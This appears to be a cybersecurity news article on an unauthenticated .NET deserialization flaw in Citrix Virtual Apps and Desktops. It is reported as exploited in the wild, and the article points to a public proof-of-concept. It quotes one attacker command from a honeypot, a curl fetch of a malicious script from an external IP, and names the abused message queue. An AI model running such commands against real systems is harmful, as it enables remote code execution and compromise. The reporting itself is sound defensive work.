Monday, November 18, 2024
HomeCyber Security NewsCitrix Virtual Apps & Desktops Zero-Day Vulnerability Exploited in the Wild

Citrix Virtual Apps & Desktops Zero-Day Vulnerability Exploited in the Wild

Published on

A critical new vulnerability has been discovered in Citrix’s Virtual Apps and Desktops solution, which is widely used to facilitate secure remote access to desktop applications now exploited in the wild.

The vulnerability, which remains unpatched, was detailed last week by Watchtowr Labs in a blog post . This flaw poses a significant threat, as the solution is frequently used in environments like call centers to isolate individual workstations from actual desktops, particularly in remote work setups.

Vulnerability Details

Citrix Virtual Apps and Desktops provide remote users access to full desktop environments from various devices, including laptops, tablets, and smartphones.

- Advertisement - SIEM as a Service

However, Watchtowr Labs warns that the same technology could be exploited by malicious actors, including ransomware groups. The problem lies in how all desktops are hosted on a single server, meaning a privilege escalation exploit could compromise not just one desktop but the entire server and all active sessions connected to it.

One particularly concerning aspect of Citrix’s solution is its session recording feature. Citrix allows administrators to record user sessions for later review, but the review process relies on a vulnerable .NET deserialization function.

This vulnerability is exploitable without requiring authentication, making it a prime target for cybercriminals. Watchtowr Labs has published proof-of-concept exploit code on GitHub , making it accessible to anyone.

Maximizing Cybersecurity ROI: Expert Tips for SME & MSP Leaders - Attend Free Webinar

Sample Exploit Details

According to SANS report, A sample exploit observed recently highlights the seriousness of the vulnerability. In a honeypot environment, a POST request was sent to a Citrix system, attempting to execute a command that fetched a malicious script from an external server.

The exploit took advantage of a messaging queue used by Citrix (msmq/private$/citrixsmaudeventdata) and sought to execute the following command:

curl http://91.212.166.60/script_xen80-mix.php

Attempts to access the malicious script led to a 404 error, raising speculation that the attacker may be filtering requests based on IP addresses or collecting IP addresses for future attacks.

The attack originated from IP address 192.143.1.40, which is linked to an ISP in Johannesburg, South Africa.

The unpatched vulnerability in Citrix Virtual Apps and Desktops poses a severe risk to organizations relying on the platform for remote access.

Since the exploit allows attackers to execute commands remotely without authentication, it could lead to widespread system compromise. The fact that all desktops are hosted on the same server exacerbates the issue, as an attacker gaining control of one session could potentially control all connected sessions.

Citrix has not yet released a patch for this vulnerability, and organizations using the affected product should be on high alert.

In the meantime, Watchtowr Labs advises organizations to monitor for unusual activity, especially from unfamiliar IP addresses, and to consider implementing additional security measures to mitigate the potential impact of this vulnerability.

Simplify and speed up Threat Analysis Workflow by Auto-detonating Cyber Attacks in a Malware sandbox

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

Zohocorp ManageEngine ADAudit Plus SQL Injection Vulnerability

Zohocorp, the company behind ManageEngine, has released a security update addressing a critical SQL...

Sonatype Nexus Repository Manager Hit by RCE & XSS Vulnerability

Sonatype, the company behind the popular Nexus Repository Manager, has issued security advisories addressing...

GeoVision 0-Day Vulnerability Exploited in the Wild

Cybersecurity researchers have detected the active exploitation of a zero-day vulnerability in GeoVision devices,...

Critical TP-Link DHCP Vulnerability Let Attackers Execute Arbitrary Code Remotely

A critical security flaw has been uncovered in certain TP-Link routers, potentially allowing malicious...

Free Webinar

Protect Websites & APIs from Malware Attack

Malware targeting customer-facing websites and API applications poses significant risks, including compliance violations, defacements, and even blacklisting.

Join us for an insightful webinar featuring Vivek Gopalan, VP of Products at Indusface, as he shares effective strategies for safeguarding websites and APIs against malware.

Discussion points

Scan DOM, internal links, and JavaScript libraries for hidden malware.
Detect website defacements in real time.
Protect your brand by monitoring for potential blacklisting.
Prevent malware from infiltrating your server and cloud infrastructure.

More like this

Zohocorp ManageEngine ADAudit Plus SQL Injection Vulnerability

Zohocorp, the company behind ManageEngine, has released a security update addressing a critical SQL...

Sonatype Nexus Repository Manager Hit by RCE & XSS Vulnerability

Sonatype, the company behind the popular Nexus Repository Manager, has issued security advisories addressing...

GeoVision 0-Day Vulnerability Exploited in the Wild

Cybersecurity researchers have detected the active exploitation of a zero-day vulnerability in GeoVision devices,...